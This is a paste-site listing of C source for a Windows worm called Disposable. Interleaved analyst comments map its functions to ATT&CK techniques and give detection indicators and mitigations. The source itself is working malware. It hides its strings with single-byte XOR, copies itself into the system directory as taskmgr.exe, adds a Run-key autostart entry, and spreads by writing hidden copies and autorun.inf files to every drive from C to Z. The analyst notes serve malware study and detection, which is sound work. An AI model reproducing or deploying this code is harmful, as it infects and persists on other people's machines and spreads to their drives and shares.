FlyFar

Worm.Win32.Disposable - Hav0c - Rohitab

Jul 7th, 2023
C 3.49 KB | Cybersecurity | 0 0
  1. /* disposable.c - coded by Hav0c
  2.  
  3. This l33t worm is the first one I've made
  4.  
  5. that uses encrypted strings to avoid being
  6.  
  7. too suspicious when opened with hex editors
  8.  
  9. or even windbl0wz notepad. Spreads by copying itself to drives
  10.  
  11. (from C to Z, without checking if they are removable or not).
  12.  
  13. Compiles with Dev-C++ (I run it with WINE).
  14.  
  15.  
  16.  
  17. PS: I hate skiddies
  18.  
  19. PPS: Blasted Mechanism FTW!!1
  20.  
  21. */
  22.  
  23.  
  24.  
  25. #include <stdio.h>
  26.  
  27. #include <stdlib.h>
  28.  
  29. #include <string.h>
  30.  
  31. #include <windows.h>
  32.  
  33.  
  34.  
  35.  
  /* Analyst note: both globals are stored XOR-ed with the single byte 0x04 and
     are passed to decrypt(..., 4) elsewhere in this listing; the trailing //
     comments are the author's stated plaintext. A one-byte XOR only hides the
     strings from a plain strings/hex view (ATT&CK T1027); a single-byte XOR
     sweep over the binary recovers them, so the decoded forms below are usable
     as static signatures.
     The <span class="searchlite"> tags inside identifiers are search-highlight
     residue from the hosting page, not part of the C source. */
  36. char teh<span class="searchlite">worm</span>[]="XXpewoicv*a|a"; // \\taskmgr.exe
  37.  
  38. char regkey[]="WkbpsevaXXImgvkwkbpXXSmj`kswXXGqvvajpRavwmkjXXVqjXX"; // Software\\Microsoft\\Windows\\CurrentVersion\\Run\\
  39.  
  40.  
  41.  
  /* decrypt: XORs each byte of `string`, up to the length reported by strlen(),
     with `key`, modifying the buffer in place, and returns `string`.
     Every call site in this listing passes key 4.
     Analyst note: a tight "byte ^= constant" loop over a string right before
     Win32 API calls is a common string-obfuscation pattern; it offers no
     cryptographic protection, and the key is visible at each call site. */
  42. int decrypt(char string[], int key)
  43.  
  44. {
  45.  
  46.     int strsz=strlen(string);
  47.  
  48.     int i;
  49.  
  50.     for(i=0;i<strsz;i++){
  51.  
  52.         string[i] ^= key;
  53.  
  54.     }
  55.  
  56.     return string;
  57.  
  58. }
  59.  
  60.  
  61.  
  /* CheckForMutex: single-instance guard. Creates a named mutex `tehMutex`
     (second argument 1 = request initial ownership) and calls ExitProcess(0)
     when GetLastError() reports ERROR_ALREADY_EXISTS, i.e. when a mutex of that
     name is already present.
     Analyst note: the handle is not closed in this function, so the named mutex
     is expected to stay visible in the process's handle table while it runs.
     A fixed mutex name is therefore a host-based indicator that handle
     enumeration or EDR telemetry can match on. */
  62. int CheckForMutex(char tehMutex[])
  63.  
  64. {
  65.  
  66.     HANDLE hMutex;
  67.  
  68.     hMutex=CreateMutex(NULL,1,tehMutex);
  69.  
  70.     if(GetLastError()==ERROR_ALREADY_EXISTS){
  71.  
  72.         ExitProcess(0);
  73.  
  74.     }
  75.  
  76. }
  77.  
  78.  
  79.  
  /* RootKit: sets the HIDDEN, READONLY and SYSTEM attributes on `file` with
     SetFileAttributes. As the author's own comment says, this is attribute
     hiding only (ATT&CK T1564.001), not a rootkit: nothing is hooked or
     filtered.
     Analyst note: such files are still listed by `dir /a`, by `attrib`, and by
     Explorer once "hide protected operating system files" is turned off; an
     executable or autorun.inf carrying all three attributes at a drive root is
     worth flagging. */
  80. void RootKit(char file[]) // Not a real rootkit obviously, just hides some stuff
  81.  
  82. {
  83.  
  84.     SetFileAttributes(file,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
  85.  
  86. }
  87.  
  88.  
  89.  
  /* MakeRegKey: persistence step. Calls RegOpenKeyEx with KEY_SET_VALUE on
     HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER for the decoded `regkey` path
     (per the author's comment: Software\Microsoft\Windows\CurrentVersion\Run),
     then RegSetValueEx with a REG_SZ value whose name is the decoded literal
     (per the author's comment: "taskmgr") and whose data is `destiny`, and
     closes the key. The else branch terminates the process with ExitProcess(0).
     Analyst note: this is Run-key autostart (ATT&CK T1547.001). Detection:
     alert on writes to the Run keys under HKLM/HKCU by unsigned or newly
     dropped binaries, and on a Run value named after a Windows system tool.
     Autoruns-style tooling lists the entry. Writing under HKLM normally needs
     administrative rights, so least-privilege accounts limit this step to
     HKCU. */
  90. void MakeRegKey(char destiny[])
  91.  
  92. {
  93.  
  94.     HKEY hKey;
  95.  
  96.     char buffer[MAX_PATH];
  97.  
  98.     strcpy(buffer,decrypt("pewoicv",4)); // taskmgr
  99.  
  100.     if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,decrypt(regkey,4),0,KEY_SET_VALUE,&hKey)||
  101.         RegOpenKeyEx(HKEY_CURRENT_USER,decrypt(regkey,4),0,KEY_SET_VALUE,&hKey)==ERROR_SUCCESS){
  102.  
  103.         RegSetValueEx(hKey,buffer,0,REG_SZ,(const unsigned char *)destiny,sizeof(destiny));
  104.  
  105.         RegCloseKey(hKey);
  106.  
  107.     }
  108.  
  109.     else{
  110.  
  111.         ExitProcess(0);
  112.  
  113.     }
  114.  
  115. }
  116.  
  117.  
  118.  
  /* DriveSpread: propagation step. Decodes three literals (per the author's
     comments: an autorun.inf path, a Hav0c.exe path, and an [autorun] section
     with open= and ShellExecute= entries), then loops over drive letters 'C'
     through 'Z', replacing the first character of both paths with the current
     letter. For each letter it calls CopyFile from `shizzle` to the .exe path
     (third argument 0, so an existing file may be overwritten) and, when that
     call reports success, RootKit() on the copy. It then fopen()s the
     autorun.inf path, fprintf()s the decoded text into it, closes it, and calls
     RootKit() on it.
     Analyst note: no GetDriveType check is made (the header comment says so
     too), so fixed disks and mapped network shares in C:-Z: are touched as well
     as removable media (ATT&CK T1091). Indicators: a Hav0c.exe and autorun.inf
     pair at a drive root with hidden+system+read-only attributes, and one
     process writing to many drive roots in quick succession.
     Mitigation: keep AutoRun disabled (NoDriveTypeAutoRun policy). Windows 7
     and later do not honor autorun.inf open/ShellExecute entries on
     non-optical removable media by default. */
  119. void DriveSpread(char shizzle[])
  120.  
  121. {
  122.  
  123.     FILE *fp;
  124.  
  125.     int n;
  126.  
  127.     char buffer1[MAX_PATH],buffer2[MAX_PATH],buffer3[MAX_PATH];
  128.  
  129.     strcpy(buffer1,decrypt("G>XXeqpkvqj*mjb",4)); // C:\\autorun.inf
  130.  
  131.     strcpy(buffer2,decrypt("G>XXLer4g*a|a",4)); // C:\\Hav0c.exe
  132.  
  133.     strcpy(buffer3,decrypt("_eqpkvqjYXvXjktaj9Ler4g*a|aXvXjWlahhA|agqpa9Ler4g*a|aXvXj",4)); // [autorun]\r\nopen=Hav0c.exe\r\nShellExecute=Hav0c.exe\r\n
  134.  
  135.     for(n='C';n<='Z';n++){
  136.  
  137.         buffer1[0]=n;
  138.  
  139.         buffer2[0]=n;
  140.  
  141.         if(CopyFile(shizzle,buffer2,0)!=NULL){
  142.  
  143.             RootKit(buffer2);
  144.  
  145.         }
  146.  
  147.         if((fp=fopen(buffer1,writting))!=NULL){
  148.  
  149.             fprintf(fp,buffer3);
  150.  
  151.             fclose(fp);
  152.  
  153.             RootKit(buffer1);
  154.  
  155.         }
  156.  
  157.     }
  158.  
  159. }
  160.  
  161.  
  162.  
  /* main: entry point; runs the stages in a fixed order.
       1. CheckForMutex() with a literal that XOR-4 decodes to "Hav0c_Ownz_Dio"
          (single-instance guard; the name is a host indicator).
       2. GetModuleFileName() to obtain its own path, and GetSystemDirectory()
          plus the decoded "\\taskmgr.exe" suffix to build a destination path.
       3. CopyFile() of itself to that path (third argument 0), RootKit() to
          set hidden/system/read-only on it, MakeRegKey() for Run-key autostart.
       4. Endless loop: DriveSpread(), then Sleep(20000), i.e. every 20 seconds.
     The author's comment states that the payload function was left out of this
     listing.
     Analyst note: the drop name matches a legitimate Windows binary in the
     system directory (masquerading, ATT&CK T1036.005). Useful signals are a
     non-installer process writing taskmgr.exe there, a signature or hash
     mismatch on that file, the mutex above, and repeated root-of-drive writes
     on a 20-second cadence. On current Windows the system directory is
     protected, so this step presumably fails without elevated rights; this
     should be confirmed on the target OS build. */
  163. int main()
  164.  
  165. {
  166.  
  167.     char sysdir[MAX_PATH];
  168.  
  169.     char <span class="searchlite">worm</span>[MAX_PATH];
  170.  
  171.     CheckForMutex(decrypt("Ler4g[Ksj~[@mk",4)); // find it out your self
  172.  
  173.     HMODULE GetModH=GetModuleHandle(NULL);
  174.  
  175.     GetModuleFileName(GetModH,<span class="searchlite">worm</span>,sizeof(<span class="searchlite">worm</span>));
  176.  
  177.     GetSystemDirectory(sysdir,sizeof(sysdir));
  178.  
  179.     strcat(sysdir,decrypt(teh<span class="searchlite">worm</span>,4));
  180.  
  181.     CopyFile(<span class="searchlite">worm</span>,sysdir,0);
  182.  
  183.     RootKit(sysdir);
  184.  
  185.     MakeRegKey(sysdir);
  186.  
  187.     while(1){
  188.  
  189.         DriveSpread(<span class="searchlite">worm</span>);
  190.  
  191.         //Payload here(function not included to avoid üb3r unl33t skiddiz <_<)
  192.  
  193.         Sleep(20000);
  194.  
  195.     }
  196.  
  197.     return 0;
  198.  
  199. }
Tags: worm